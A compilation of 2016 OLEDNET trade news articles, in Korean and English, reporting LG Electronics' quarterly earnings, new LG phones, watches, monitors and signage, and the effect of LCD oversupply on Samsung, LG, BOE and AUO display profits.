LG전자 2016년 2분기 실적은 전년동기 대비 매출 0.5% 증가, 영업이익은 139.4% 증가했다. 전분기 대비로는 매출 4.8%증가, 영업이익은 15.7% 증가했다.

잠정 실적은 한국채택 국제회계기준(K-IFRS)에 의거해 추정한 전체 매출액과 영업이익 예상치이며, 연결기준 당기순이익 및 사업부문별 구체적인 실적을 포함한 수치는 실적설명회 당일에 발표할 예정이다.

LG전자는 주주 및 투자자들에게 보다 신속하고 효과적으로 경영실적 정보를 전달하고자 2016년 1분기 실적부터 잠정실적을 먼저 공시하고 있다.

LG Elec. Estimates That Consolidated Operating Profit Came to KRW 584.6 billion for Q2

Source = LGD

Source = LG

Hyunjoo Kang / jjoo@olednet.com
LG Electronics Inc. (LG) today announced its preliminary earnings results for the second quarter of 2016
Tentative consolidated revenues for the second of 2016 is 14 trillion KRW and operating profit is 584.6 billion KRW. Revenues are expected to be 0.5 percent higher than the same period the year prior while operating profit will be 139.5 percent higher year-over-year.

(Unit: KRW bn)

  2016 2Q 2016 1Q QoQ 2015 2Q YoY
SALES 14,001.7 13,362.1 4.8% 13,925.7 0.5%
OPERATING PROFIT 584.6 505.2 15.7% 244.1 139.5%

 

These figures are the tentative consolidated earnings based on K-IFRS. This tentative earnings is provided as a service to investors prior to LG Electronics’ final earnings results including net profit and details regarding each division which will be announced officially later this month.

LG전자, ‘스타일러스2 플러스’ 대만 등 글로벌 출시

LG Stylus 2 Plus(출처=LG전자)

강현주 / jjoo@olednet.com

LG전자가 ‘LG 스타일러스 2 플러스 (LG Stylus 2 plus) ’를 1일 대만을 시작으로 멕시코, 터키, 싱가포르, 인도, 홍콩, 미국 등 글로벌 시장에 순차 출시한다.

‘스타일러스2 플러스’는 합리적인 가격에 펜타입 대화면을 제공해 호평받은 바 있는 ‘스타일러스 2’의 후속 제품이다. ‘스타일러스 2 플러스’는 정교한 필기감을 구현하는 ‘스타일러스 펜’을 내장하고 5.7 인치 대화면을 유지하면서도 멀티미디어 성능을 강화했다.

LG전자는 ‘스타일러스2 플러스’에 풀 HD 디스플레이와 옥타코어 프로세서를 탑재해 화질과 속도 등 성능을 높였다. LG전자는 최근 고성능 카메라를 원하는 소비자 성향을 고려해, 이 제품 후면에 1,600만 화소의 카메라를 장착했다. 또, 사용자가 어두운 저녁이나 실내 등 시간, 공간에 구애받지 않고 셀피 촬영을 할 수 있도록 제품 전면에도 플래시를 추가했다.

한편, 제품 측면에는 ‘메탈릭 크롬 라인’을 적용해 고급스러움을 더했다. 이 제품 색상은 티탄, 브라운, 골드 세 가지다. 미국 출시 제품에는 화면과 콘텐츠 잠금기능을 지원하는 지문인식 센서도 탑재할 예정이다.

‘스타일러스2 플러스’는 △ ‘스타일러스 펜’을 뽑으면 자동으로 바로가기 메뉴가 뜨는 ‘펜 팝 (Pen Pop)’ △ 화면이 꺼진 상태에서도 화면 위에 바로 메모 가능한 ‘바로 메모’ △ 펜 분실을 방지하기 위해 펜이 스마트폰과 일정거리 이상 떨어지면 알림을 제공하는 ‘펜 지킴이’ 등의 기능이 있다.

LG전자 대표이사 MC사업본부장 조준호 사장은 “스타일러스2 플러스는 멀티미디어 기능에 최적화한 보급형 스마트폰”이라며, “차별화한 소비자 경험을 앞세워 글로벌 경쟁력을 강화할 것”이라고 강조했다.

Not Only Samsung and LG, but Also BOE and AUO…Panel Profit Plunges due to LCD

Source = BOE

Source = BOE

 Hyunjoo Kang / Reporter / jjoo@olednet.com

Although Samsung and LG both had smooth Q1 2016 for set businesses including TV, display sectors were different. The majority of the industry believes that global oversupply of LCD’s effects was great. Key LCD players in China, who could be seen as responsible for the LCD oversupply, also showed bleak performance. Key global LCD panel companies, including BOE and AUO, also revealed much reduced Q1 2016 profit.

On 28 April, Samsung Electronics and LG Electronics announced that the business profit in Q1 2016 improved. Samsung Electronics recorded KRW 6.68 trillion business profit, a 12% increase compared to Q1 2015. LG Electronics also announced operating profit of KRW 505.2 billion, up 65.5% from last year. Both companies emphasized favorable TV business.

On the other hand, Samsung and LG both received significant damages in display sector. In Q1 2016, Samsung Display recorded operating loss of KRW 270 billion. Samsung Display recorded a profit against expectations. However, the business profit of KRW 39,500 million in Q1 2016 is a 94.7% fall from last year.

Not only Samsung and LG, but display leaders in Greater China region also showed much diminished performance. BOE, which has been aggressively investing in large area LCD mass production, showed a 6.7% increase from previous year with approximately CNY 12,300 million for Q1 2016 revenue. In Q1, BOE showed business profit of CNY 108 million, but profit ratio plummeted compared to the same period in 2015. The profit ratio in Q1 2016 fell to 0.8% from 8% in Q1 2015. On 28 April, Taiwan’s AUO also revealed TWD 5.58 trillion business loss in Q1 2016.

BOE and AUO are both key players within the global LCD TV panel industry, and within the top 5 in the Greater China region. BOE, in particular, is chasing the leader LG Display with aggressive product supply. The fact that BOE recorded dismal results despite this is analyzed to be due to price fall due to the oversupply of LCD and spread of OLED among others.

For global OLED leader for mobile device, Samsung Display, was known to have recorded deficit of approximately KRW 900 billion in LCD despite Samsung Electronics’ strength in OLED smartphone. Essentially, LCD eroded the profit that OLED brought. For LG Display, experts believe that as a leader of OLED for TV market, the company could avoid deficit by making up for the damages from the LCD price fall.

An expert of the display industry explained that LCD leaders such as BOE might have expanded market share with the product supply, but would have received significant damage in profit ratio. However, he explained that compared to 30 inch LCD panel, 50 inch and 60 inch level large area LCD panel received less fallout from the price fall. He then estimated that as the large size TV demand is increasing, the LCD industry could be improved in Q2.

 

삼성, LG 뿐 아니라 BOE, AUO도…디스플레이 업계 LCD발 이익 폭락

출처 = BOE

출처 = BOE

강현주 기자 / jjoo@olednet.com

삼성, LG 모두 2016년 1분기 TV 등 세트 사업은 순항했지만 디스플레이 부문은 우울했다. 글로벌 LCD 공급과잉 여파가 컸다는 게 업계 중론이다. LCD 공급과잉을 주도했다고 볼 수 있는 중화권의 주요 LCD 주자들의 실적 역시 암울하다. BOE, AUO 등 글로벌 주요 LCD 패널 업체들도 2016년 1분기 이익이 폭락한 것으로 나타났다.

28일 삼성전자, LG전자 모두 2016년 1분기 영업이익이 개선됐다고 발표했다. 삼성전자는 영업이익 6조6800억원을 기록, 각각 전년동기 대비 12% 증가했다. LG전자도 1분기 연결영업이익 5,052억원으로 전년동기 대비 65.5% 상승했다고 발표했다. 두 회사 모두 TV 사업의 호조를 강조했다.

반면 디스플레이 부문에서는 삼성, LG 모두 타격이 컸다. 삼성디스플레이는 2016년 1분기 2700억원의 영업손실을 기록했다. LG디스플레이는 적자를 기록할 것이라는 예상을 깨고 2016년 1분기에도 395억원의 영업이익 흑자를 달성하긴 했지만 전년동기에 비해서는 무려 94.7% 하락했다.

삼성, LG 뿐 아니라 중화권 디스플레이 주자들도 성적이 크게 떨어졌다.

대형 LCD 양산에 공격적으로 투자해온 BOE는 2016년 1분기 매출이 약 123억위안으로 전년동기 대비 6.7% 상승했다. 1분기 이 회사는 1억 800만위안의 영업이익을 올렸지만 전년동기에 비해서 이익율이 폭락했다. 2015년 1분기 BOE의 매출대비 영업이익률은 8%에 달했지만 올해 1분기는 0.8%에 불과하다.

대만의 AUO 역시 28일 실적발표를 통해 2016년 1분기에 5조5800억 대만달러의 영업손실을 기록했다고 밝혔다.

BOE, AUO 모두 글로벌 LCD TV 패널 업계에서 출하량 기준 점유율 상위권에 속하며 중화권에서는 5위안에 있다. 특히 BOE는 최근 공격적인 물량공세로 세계 1위인 LG디스플레이를 바짝 따라붙고 있다. 그럼에도 우울한 실적을 기록한 것은 LCD 공급과잉으로 인한 가격폭락과 OLED 확산 등이 요인으로 분석된다.

글로벌 모바일 OLED 최강자인 삼성디스플레이의 경우 삼성전자의 OLED 스마트폰 강세에도 LCD 부문에서 9천억원에 달하는 적자를 기록한 것으로 알려졌는데, OLED로 번 돈을 LCD로 갉아먹은 셈이다. LG디스플레이의 경우 TV용 OLED 시장을 리드하고 있는 입장이라 LCD 가격 폭락 타격을 그나마 완충한 것이 적자는 면할 수 있었던 한 요인이라고 전문가들은 보고 있다.

디스플레이 업계 한 전문가는 “BOE 같은 LCD 대표주자들은 물량공세로 점유율은 늘렸겠지만 이익률에는 타격이 클 것”이라고 했다. 그는 “하지만 LCD라 해도 30인치대 패널들에 비해 50인치대, 60인치대 같은 대형 쪽은 비교적 가격폭락 영향이 적었다”라며 “대형 TV 수요가 증가하고 있어 LCD 업계의 상황도 2분기에는 개선될 수 있을 것”이라고 내다봤다.

LG 전자 2016년 1분기 영업이익 5052억원…65.5% ↑

Source : LG Elec.

Source : LG Elec.

강현주 기자 / jjoo@olednet.com

LG 전자가 2016년 1분기 연결매출 13조 3,621억 원, 연결영업이익 5,052억 원을 기록했다고 28일 발표했다.

매출액은 TV와 스마트폰 시장 성장세 둔화 영향으로 전년 동기(13조 9,944억 원), 전 분기(14조 5,601억 원) 대비 각각 4.5%, 8.2% 감소했다. 영업이익은 생활가전, TV 등 가전사업의 수익성이 크게 개선되면서 전년 동기(3,052억 원) 대비 65.5%, 전 분기(3,490억 원) 대비 44.8% 증가했다.

특히 H&A사업본부와 HE사업본부는 분기 사상 최대 영업이익 및 최고 영업이익률(H&A: 9.7%, HE: 7.7%)을 달성하며 실적 호조를 이끌었다.

H&A(Home Appliance & Air Solution)사업본부는 매출액 4조 2,195억 원, 영업이익 4,078억 원을 기록했다. H&A사업본부 매출액은 트윈워시 세탁기, 얼음정수기 냉장고, 오븐, 빌트인 주방가전 등 프리미엄 제품 판매 호조와 시스템 에어컨 등 B2B 사업 성장에 힘입어 전년 동기 대비 3.8%, 전 분기 대비 10.2% 증가했다. 영업이익은 지속적인 원가경쟁력 개선 및 프리미엄 제품 판매 비중 확대로 전년 동기 대비 77.7%, 전 분기 대비 89.9% 증가했다.

MC(Mobile Communications)사업본부는 매출액 2조 9,632억 원, 영업손실 2,022억 원이다.  MC사업본부 매출액은 신제품(G5) 대기수요 발생으로 인한 기존 모델 판매 감소와 중남미, CIS 등 성장 시장의 경제불안 영향으로 전년 동기 대비 15.5%, 전 분기 대비 19.3% 감소했다. 또 G5의 마케팅 비용 선집행으로 전 분기 대비 영업손실이 확대됐다.

HE(Home Entertainment)사업본부는 매출액 4조 3,334억 원, 영업이익 3,352억 원을 기록했다.  HE사업본부 매출액은 TV 시장의 계절적 비수기 영향으로 전년 동기, 전 분기 대비 각각 2.3%, 8.6% 감소했다. 영업이익은 올레드 TV, 울트라HD TV 등 프리미엄 제품 판매 확대 및 원가경쟁력 개선으로 전년 동기 대비 흑자전환, 전 분기 대비 207% 증가했다.

VC(Vehicle Components)사업본부는 매출액 5,929억 원, 영업손실 158억 원이다. VC사업본부는 AVN(Audio Video Navigation), 텔레매틱스(Telematics) 등 차량용 인포테인먼트 사업을 중심으로 성장해 매출액이 전년 동기 대비 55%, 전 분기 대비 13.9% 증가했다. 인포테인먼트 기기, 전기차용 부품 등 미래 성장을 위한 자원 투입 증가로 영업손실을 기록했다.
LG 전자는 2분기에 가전 시장은 북미, 유럽 등 선진 시장의 성장세가 유지될 것으로 전망했다. H&A사업본부는 일반 가전(프리스탠딩)의 초프리미엄 브랜드 ‘LG 시그니처(LG SIGNATURE)’와 빌트인 분야의 초프리미엄 브랜드 ‘시그니처 키친 스위트’ 등 시장선도 제품을 확대 출시하고, 원가 경쟁력을 지속 강화한다.

스마트폰 시장 성장 정체에 따른 제조사 간 시장 점유율 경쟁은 더욱 심화될 것으로 예상된다. MC사업본부는 전략 스마트폰 G5의 본격적인 글로벌 출시 및 보급형 신모델 판매 확대 등으로 매출을 확대하는 한편, 원가 경쟁력 강화 활동을 통해 수익성 개선에 주력한다.

TV 수요 정체는 지속될 것으로 전망되나 프리미엄 제품에 대한 수요는 확대될 것으로 예상된다. HE사업본부는 올레드 TV, 울트라HD TV 등 프리미엄 제품 판매 비중 확대로 건전한 수익성을 유지한다.

전기차 시장 성장 및 전장 부품 시장의 고급화에 힘입어 자동차 부품 사업기회가 확대될 것으로 전망된다. VC사업본부는 미래 자동차 핵심 부품에 대한 지속적인 투자를 통해 성장 기반을 강화한다.

LG Elec.`s operating profit is 505.2 billion KRW 1Q 2016…65.5%↑

LG Elec. announced its preliminary earnings results for the 1Q of 2016(Source=LG Elec.)

LG Elec. announced its preliminary earnings results for the 1Q of 2016(Source=LG Elec.)

Hyunjoo Kang / jjoo@olednet.com

LG Electronics Inc. (LG) today announced its preliminary earnings results for the first quarter of 2016.
Tentative consolidated revenues for the first quarter of 2016 is 13.36 trillion KRW and operating profit is 505.2 billion KRW. Revenues are expected to be 4.5 percent lower than the same period the year prior while operating profit will be 65.5 percent higher year-over-year.

These figures are the tentative consolidated earnings based on K-IFRS. This tentative earnings is provided as a service to investors prior to LG Electronics’ final earnings results including net profit and details regarding each division which will be announced officially later this month.

LG전자, 2016년 1Q 영업익 5052억원…65.5% 상승

LG전자가 1Q 깜짝 실적을 잠정 발표했다(출처=LG전자)

LG전자가 1Q 깜짝 실적을 잠정 발표했다(출처=LG전자)

11일 LG전자가 2016년 1Q에 전년동기 대비 65.5% 상승한 5,052억원의 영업이익을 올렸다고 잠정실적을 발표했다.

LG전자는 연결기준 매출 13조 3,621억원, 영업이익 5,052억원의 2016년 1Q 잠정실적을 발표했다.

LG전자 2016년 1Q 실적은 전년동기 대비 매출 4.5% 감소, 영업이익 65.5% 증가했다. 전분기 대비로는 매출 8.2% 감소, 영업이익 44.8% 증가했다.

잠정 실적은 한국채택 국제회계기준(K-IFRS)에 의거해 추정한 전체 매출액과 영업이익 예상치이며, 연결기준 당기순이익 및 사업부문별 구체적인 실적을 포함한 수치는 실적설명회 당일에 발표할 예정이다.

LG전자는 주주 및 투자자들에게 보다 신속하고 효과적으로 경영실적 정보를 전달하고자 2016년 1Q 실적부터 월초에 잠정실적을 먼저 공시한 후, 월말에 확정실적을 공시할 계획이다.

이세돌이 착용했던 LG Smart Watch, 한국 출시

강현주 기자 /jjoo@olednet.com

출처=LG전자

이세돌이 알파고와의 대국때 착용했던 그 Smart Watch가 한국에 출시된다.

LG전자가 LTE 통신기능을 지원하는 안드로이드 웨어 Smart Watch ‘LG 워치 어베인 세컨드 에디션’을 7일부터 한국 시장에 주요 이통 3사를 통해 출시한다고 6일 발표했다.

‘LG 워치 어베인 세컨드 에디션’은 블루투스로 스마트폰과 연동해 사용할 수 있을 뿐만 아니라, 스마트폰 없이 단독으로 LTE 음성통화, 메시지 송∙수신 등이 가능하다. 이 제품은 안드로이드 4.3과 iOS 8.2 이상의 모든 스마트폰과 연동할 수 있다.

LG전자는 이 제품에 3개의 물리버튼을 탑재해, 버튼 조작에 따라 ‘즐겨찾는 연락처’, ‘메뉴’, ‘극장모드’, ‘LG헬스’ 등 다양한 기능을 직관적으로 사용할 수 있게 했다. 현존하는 스마트워치 가운데 가장 뛰어난 해상도(480×480, 348ppi)를 구현해, 화면을 더욱 선명하고 생동감 있게 표현한다. 또, 이 제품은 타사 대비 약 2배 용량의 570mAh 대용량 배터리를 채택했다.

이 제품의 스트랩은 겉면에 가죽을 별도로 입힌 ‘시그니처 브라운’ 색상이다. 스트랩 옆면 등 내부는 피부에 거부감을 주지 않는 ‘팁시브 엘라스토머’ 재질이다. 이 제품은 ‘고릴라 글래스3’ 강화유리와 하이엔드 아날로그 시계가 채택하던 ‘스테인리스 스틸 316L’을 채용해 내구성을 높였다. 또, 조금의 먼지도 통과되지 않고 최고 1m 수심에서 30분까지 견딜 수 있는 IP67 등급의 방진, 방수가 된다.

한편, LG전자는 지난 3월 이세돌 9단과 인공지능(AI)의 대국에서 이세돌 9단이 ‘LG G 워치 어베인 세컨드 에디션’를 착용하도록 후원한 바 있다.

LG전자 대표이사 MC사업본부장 조준호 사장은 “Smart Watch 시장에서 세계최초로 원형 디자인 트렌드를 선도해 왔듯, 이번 제품도 편의성, 호환성을 한 단계 업그레이드했다”며, “안드로이드 웨어 기반 스마트워치 하나만으로도 자체 통신이 가능한 시대를 열었다는 데 의미가 깊다”고 강조했다.

LG전자, 4K 영상 위한 울트라HD 모니터 출시

강현주 기자 / jjoo@olednet.com

LG 울트라HD 모니터(출처=LG전자)

LG 울트라HD 모니터(출처=LG전자)

LG전자가 10억 개의 색상으로 생생한 화질을 구현하는 울트라HD 모니터를 출시했다고 4일 발표했다.

LG전자는 최근 풀HD보다 4배 높은 해상도인 4K(3,840X2,160)를 적용한 16:9 화면비의 울트라HD 모니터 신제품 2종(모델명: 27UD88, 27UD68P)을 국내 시장에 선보였다.

글로벌 울트라HD 모니터 시장은 지난해에 약 70만 대 규모였고, 올해는 약 3배인 200만 대 규모로 빠르게 늘 것으로 전망된다.

신제품(모델명: 27UD88)은 고해상도 콘텐츠를 완벽하게 보여준다. 표현할 수 있는 색상도 약 10억 개에 달해 현실감 넘치는 화면을 구현한다. 4K 해상도를 적용해 사진을 확대해도 눈가의 주름과 머리카락 한 올까지 선명하게 보여준다. 측면에서 보더라도 화면이 선명한 IPS패널을 적용했다.

이 제품은 사진과 영상을 섬세하게 편집하는 전문가들의 작업에 특히 유용하다. 모니터를 오래 사용하더라도, 사용자가 별도의 색상 측정 장비와 함께 하드웨어 캘리브레이션 기능을 사용하면 새 제품같은 색상을 느낄 수 있다. 사용자가 시계 방향으로 화면을 90도 돌리면 세로로 길게 사용할 수도 있다. 스마트폰으로 세로로 찍은 사진이나 동영상을 감상하고 편집할 때 유용하다.

울트라HD 모니터는 사용자가 게임이나 영화를 즐길 때도 탁월한 경험을 제공한다. AMD의 프리싱크 기술은 빠르게 움직이는 화면도 깨지거나 끊김 없이 자연스럽게 보여준다. 블랙 스태빌라이저 기능은 비슷하게 보이는 어두운 색상들도 선명하게 구별해준다.

편의성도 뛰어나다. 이 제품은 USB 타입-C 단자를 세계 최초로 적용했다. 사용자가 이 단자를 이용해 모니터와 노트북을 연결하면 4K 화질의 영상, 사진 등을 모니터에서 볼 수 있고, 동시에 노트북을 충전할 수 있다. 이 경우에 노트북을 충전하기 위해 별도의 어댑터를 사용할 필요가 없어서 편리하다. 최신 USB 타입-C 단자는 그램 15 노트북, G5 스마트폰 등 최신 IT기기에 적용되고 있다.

사용자는 마우스 조작만으로 화면을 얼마나 밝게 할지, 몇 개의 창을 띄워서 쓸지를 설정할 수 있다. 기존에는 모니터 모서리에 있는 버튼을 여러 번 눌러서 바꿔야 했다.

4K 콘텐츠가 더욱 풍성해지고 있다. 영화, 드라마 등을 서비스하는 넷플릭스, 글로벌 게임 업체인 블리자드 등이 4K 콘텐츠를 잇따라 선보이고 있다. 유튜브에 등록된 4K 콘텐츠도 이미 1,700만 건을 넘어섰다. 이뿐 아니라 소비자들이 ‘LG G5’ 등 최신 스마트폰으로 4K 콘텐츠를 직접 만들 수도 있다.

울트라HD 모니터 신제품의 출하가는 27UD88이 75만원, 27UD68P가 65만원이다.

LG전자 한국영업 HE마케팅FD 담당 허재철 상무는 “4K 콘텐츠에 최적화한 울트라HD 모니터로 차세대 모니터 시장을 지속 선도할 것”이라고 강조했다.

Blossoming April… Hurt by LCD, Heal with OLED

Hyunjoo Kang / Reporter / jjoo@olednet.com

Flexible OLED from LGD(CES 2016)

From April, the display industry is estimated to start mending the damage carried out by LCD with OLED.

 

In Q1 2016, Korean display industry suffered due to oversupply of Chinese LCD panels. Market experts believe that Samsung Display and LG Display will announce large Q1 deficit in April due to LCD.

 

However, the display market is expected to actively improve its performance from April.

 

Dong-won Kim, analyst with Hyundai Securities, estimated that great increase in profit is expected from Q2 2016 due to the increase in OLED operation rate and yield improvement. Also because of profitability improvement effect following LCD panel’s price rebound, the deficit will decrease.

 

LG Display’s performance in OLED sector is expected to noticeably improve. Over 90% of LG Display’s total mass production line is LCD at present. Hence, the fall of LCD price in Q1 is expected to have hit hard and OLED business is also showing deficit.

OLED TV from LG(CES 2016)

◆ After Harsh Q1, Warm Breeze of OLED… Spring for Equipment Industry Too

 

However, this will change from Q2. Analyst Hyeoncheol So of Shinhan Investment forecast that LG Display’s OLED TV sales volume and revenue in Q2 2016 will increase by 144% and 106% respectively. He added that the business deficit of OLED TV sector will greatly decrease.

 

LG Display is anticipating that the deficit will turn to profit in H2 2017, with the business profit of up to 1 trillion KRW in 2017, an increase of 115%.

 

Samsung Display, whose LCD and OLED ratio is 50:50, is expected to show 900,000 million KRW in deficit in LCD sector this first quarter. However, this is estimated to be compensated to some degree by the profit in OLED.

 

Samsung Display and LG Display are actively carrying out investment in OLED panel mass production line in Q1. As well as the investment in turning the existing LCD line to OLED, investment in new OLED line establishment is actively being carried out.

 

As such, with the optimistic outlook on OLED within the display market, flexible OLED manufacturing equipment companies such as Tera Semicon, Viatron Technologies, and Dong A Eltek had been discussed as the favorites of securities companies. In fact, Samsung Display’s flexible OLED manufacturing equipment related key collaborator AP Systems showed remarkable growth recording 12,100 million KRW in business profit last year.

 

UBI Research forecast that Korean companies will strengthen their dominance with their 2016 AMOLED shipment’s 95% occupancy of the global market. As OLED is becoming stronger in the TV, smartphone, and VR market, this will become a huge growth engine for global panel companies such as Samsung and LG.

 

꽃피는 4월…LCD가 남긴 상처, OLED로 치유

강현주 기자 / jjoo@olednet.com

OLEDNET이 다녀온 CES 2016에 전시된 LGD의 플렉서블 OLED

오는 4월부터 디스플레이 업계는 LCD가 후비고 간 상처를 OLED를 통해 회복해 나갈 것으로 전망된다.

2016년 1분기 국내 디스플레이 업계는 중국발 LCD 공급과잉 후폭풍에 시달렸다. 실제로 오는 4월 실적을 발표할 예정인 삼성디스플레이, LG디스플레이는 올 1분기 LCD로 인해 큰폭의 적자를 기록할 것이라고 시장전문가들은 입을 모은다.

하지만 디스플레이 시장은 4월부터 본격적으로 실적개선을 누릴 것으로 예상된다.

현대증권 김동원 연구원은 “2016년 2분기부터 OLED 가동률 상승 및 수율 개선 등으로 큰 폭의 이익증가가 예상되며 LCD 패널의 가격반등에 따른 수익성 개선 효과로 적자도 축소될 것”이라고 전망했다.

3월 현재 OLED를 장착한 갤럭시 S7 판매가 기대치를 웃돌고 중국 스마트폰 업체들의 OLED 패널 주문이 급증하고 있는 것으로 파악된다. 이에 따라 삼성디스플레이의 평면 OLED 양산라인인 A2 라인, 플렉서블 OLED 라인인 A3라인이 풀가동 중이다.

특히 LG디스플레이의 OLED 부문 실적이 눈에 띄게 개선될 것이라는 관측이 나온다. LG디스플레이는 현재 전체 양산라인 중 LCD의 비중이 90% 이상이다. 이에 따라 올 1분기에 LCD 가격 폭락으로 인한 타격이 심할 것으로 보이는 데다가 OLED 사업에서도 적자를 내고 있다. 하지만 2분기부터는 달라진다.

OLEDNET이 다녀온 CES 2016에 전시된 LG의 OLED TV

◆혹독한 1분기 지나 OLED 훈풍…장비 업계도 ‘봄날’

신한금융투자의 소현철 연구원은 “2016년 2분기 LG디스플레이 OLED TV 판매량과 매출액은 수율과 생산능력의 증가로 지난해보다 각각 144%, 106% 늘어날 것”이라며 “올해 OLED TV 부문의 영업적자도 큰 폭으로 감소할 것”이라고 내다봤다.

LG디스플레이는 2017년 하반기에는 흑자 전환이 기대되는 상황이며 2017년 영업이익은 115% 증가한 1조원에 달할 전망이다.

LCD와 OLED 비중이 각각 50%씩인 삼성디스플레이는 올 1분기 LCD 부문에서 9천억원의 적자가 전망된다. 하지만 OLED 부문에서 흑자를 거둬 다소 완충될 것으로 보인다.

삼성디스플레이와 LG디스플레이는 올해 1분기 OLED 패널 양산라인 투자에 본격적으로 들어간 상태다. 기존 LCD 라인을 OLED 라인으로 전환 투자하는 것은 물론 OLED라인 신규 증설 투자에도 적극적으로 나서고 있다.

이처럼 디스플레이 시장에 ‘OLED 훈풍’이 예고됨에 따라 AP시스템, 테라세미콘, 비아트론, 동아엘텍 등 플렉서블 OLED 장비업체들이 증권가 선호주로 물망에 오르기도 했다.

실제로 삼성디스플레이의 Flexible OLED 장비 관련 주요 협력사인 AP시스템은 지난해 영업이익 121억원을 달성하는 등 눈에 띄는 성장세를 그리고 있다.

유비산업리서치 관계자는 “2016년 한국의 AMOLED 출하량은 전세계 시장 95%를 장악할 만큼 국내 업체들의 패권이 확고해진다”며 “TV, 스마트폰, VR 시장에서 OLED가 점점 대세가 되고 있어 이는 삼성, LG 등 글로벌 패널 업체들에게 큰 성장 동력이 될 것”이라고 분석했다.

LG Electronics Launches 58:9 Signage…Transforms Columns and Corners to Billboards

Hyunjoo Kang, Reporter, OLEDNET

<LG Elec. Launched 58:9 Ultra Stretch Signage. Source: LG Elec.>

 

On March 23, LG Electronics launched world’s first 86 inch 58:9 commercial display Ultra Stretch.

 

Ultra Stretch signage allows places which have been difficult to install signage, such as columns and corners, to be used as billboards.

 

LG Elec.’s Ultra Stretch has the widest screen ratio of the signage released. The display is 2,158 mm wide and 349 mm long, and can be installed horizontally or vertically.

 

Ultra Stretch can be used on media pole, which is integrated into columns within buildings such as airports or hotels, and billboards above building entrances. Total of 16 units of Ultra Stretch, maximum 4 units lined horizontally and vertically, can be tiled. When installed on a separate stand, Ultra Stretch can be moved to where needed.

 

This product uses LG IPS panel, and with ultra HD resolution (3840 x 600), small writing as well as customary images are clearly shown. The IPS panel has wide viewing angle of 178°, and clean images can be viewed from any directions.

 

With consideration for commercial use of signage, it was designed to for easy editing of contents as well as other amenities. The display can be divided into 4 screens maximum and provide diverse information simultaneously.

 

For example, if installed in an airport, the display can be divided into 4 sections and each can show information such as weather, traffic information, news, advertisement, and others. This will allow foreign visitors to easily receive information.

 

SuperSign W media editor is equipped for easy transformation of existing contents to 58:9 ratio. Ultra Stretch also includes around 30 sample styles specific to the product.

 

LG Elec.’s Korean B2B Marketing representative explained that Ultra Stretch is a signage never been experienced and will lead the new commercial display market.

LG전자, 58:9 사이니지 출시…기둥, 모서리도 광고판으로

<LG전자가 58:9 화면비의 ‘울트라 스트레치 사이니지’를 출시했다. 출처=LG전자>

강현주 기자/OLEDNET

23일 LG전자가 58:9 화면비의 86형 상업용 디스플레이 ‘울트라 스트레치’를 세계 최초로 출시했다.

울트라스트레치 사이니지는 기둥, 모서리 등 사이니지를 설치하기 어려웠던 곳을 광고판으로 사용할 수 있게 해주는 제품이다.

LG전자가 이번에 내놓은 울트라 스트레치는 현재까지 출시된 사이니지 가운데 가장 와이드한 화면비를 갖췄다. 가로와 세로 길이가 각각 2158mm, 349mm며 가로 방향으로 넓게 혹은 세로 방향으로 길게 설치할 수 있다.

울트라 스트레치는 공항이나 호텔 등의 건물 내부에 있는 기둥 안에 매립해 사용하는 미디어 폴, 건물 출입문 위쪽의 광고판 등에 활용할 수 있다. 가로, 세로 각각 최대 4개씩 총 16개를 이어 붙일 수 있으며 별도의 거치대에 설치하면 필요한 장소를 오가면서 사용할 수 있다.

이 제품은 LG IPS 패널을 적용, 울트라HD급 해상도(3840ⅹ600)로 일반 영상뿐 아니라 작은 글자까지 선명하게 보여준다. IPS패널은 178도의 넓은 시야각으로 어느 위치에서도 화면이 또렷하다.

이와 함께 상업용으로 사용되는 사이니지의 특성을 고려해 쉽게 콘텐츠를 편집할 수 있는 편의 기능들도 탑재했다. 최대 4개의 화면으로 나눠 쓸 수 있어 다양한 정보를 한 번에 제공한다.

가령 공항에 설치할 경우 화면을 4개로 나눠 날씨, 교통 정보, 뉴스, 광고 등을 각각 보여줄 수 있어 외국인들도 필요한 정보를 쉽게 얻을 수 있다.

기존 콘텐츠를 58:9 화면비로 쉽게 편집할 수 있는 솔루션 ‘슈퍼사인 W’를 탑재했으며 ‘울트라 스트레치’ 전용 샘플 양식을 30여 개 내장했다.

김제훈 LG전자 한국B2B마케팅 FD(Function Division) 담당은 “지금까지 경험해보지 못했던 사이니지로 새로운 상업용 디스플레이 시장을 선도할 것”이라고 말했다.

LG Electronics to Actively Induce OLED TV Demands in 2016

LG Electronics CFO, Do Hyun Jung announced that they expect this year’s OLED TV’s demand to be approximately 4 times higher than last year’s.

 

With this statement during the LG Electronics earnings announcement (January 26), Jung demonstrated determination in popularization of OLED TV. Regarding the forecast of Q1, he estimated that despite the slow season, profit structure will improve through product mix improvement and production cost structure among others.

 

It was also revealed that the UHD OLED TV and UHD premium TV sales increased in Q4 2015. Particularly, OLED TV products recorded double the amount of previous quarter’s shipment, occupying 10% of the total TV sales.

 

Regarding the total TV market, Jung forecast that the 2016 demand stagnation will continue. Revealing that LG Electronics’ TV market share fell slightly, demand for premium products such as OLED TV and UHD TV is anticipated. He added that LG Electronics will cement the image of world leading premium products through OLED TV and compete through quality and performance.

 

In Q4 2015, LG Electronics Home Entertainment business increased shipment in key markets such as Europe, Russia, and North America, and recorded revenue of 4,740,000 million KRW, a 11% growth compared to previous quarter, and business profit also increased to 2.3% from 0.9%.

 

LG Electronics Earnings Announcement

LG Electronics Earnings Announcement

LG전자, 올해 OLED TV 수요 본격화

LG전자 CFO인 정도현 사장이 ‘올해 OLED TV의 수요는 전년도에 비해 4배 가까이 될 것으로 예상된다’라고 밝혔다.

정사장은 26일 LG트윈타워에서 열린 LG전자 실적발표회에서 이같이 밝히며 ‘2016년에 OLED TV 수요를 본격화 하겠다’라고 말하며 OLED TV 대중화에 대한 의지를 내비쳤다. 1분기에 대한 전망에서는 ‘계절적 비수기지만 제품 믹스 개선과 원가 구조 등을 통해 수익 구조는 개선될 것’이라고 예상했다.

2015년 4분기는 UHD OLED TV와 UHD 프리미엄 TV 제품의 매출이 상승하였고, 특히 OLED TV 제품은 전분기 대비 2배의 출하량을 기록하며 전체 TV 매출의 10%를 차지했다고 밝혔다.

전체 TV 시장에 대해서 2016년 수요 정체는 지속될 것으로 전망했다. 또한 LG전자의 TV 점유율이 소폭 하락했다고 밝히며 수익성 중심의 운영을 내세우며 OLED TV 및 UHD TV 등 프리미엄 제품에 대한 수요 확대를 기대하고 있다. 추가로 ‘세상에 없는 TV’로 앞장 세운 OLED TV를 통한 세계 최고 프리미엄 이미지를 확고히 하며 질과 성능으로 경쟁력을 갖추겠다고 밝혔다.

